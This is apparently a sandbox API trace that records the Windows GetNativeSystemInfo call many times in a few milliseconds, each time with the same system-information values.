	[0025.537] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.537] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.537] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.537] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.537] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.537] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.538] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.538] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.538] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.538] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.538] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.538] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.538] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.538] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.538] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.538] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.538] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.539] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.539] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.539] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.539] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.539] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.539] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.539] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.539] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.539] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.539] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.539] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.539] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.540] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.540] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.540] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.540] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.540] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.540] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.540] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.540] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.540] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.540] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.540] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.540] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.541] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.541] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.541] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.541] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.541] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.541] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.541] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.541] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.541] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.541] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.541] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.542] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.542] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.542] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.542] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.542] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.542] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.542] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.542] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.542] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.542] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.542] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
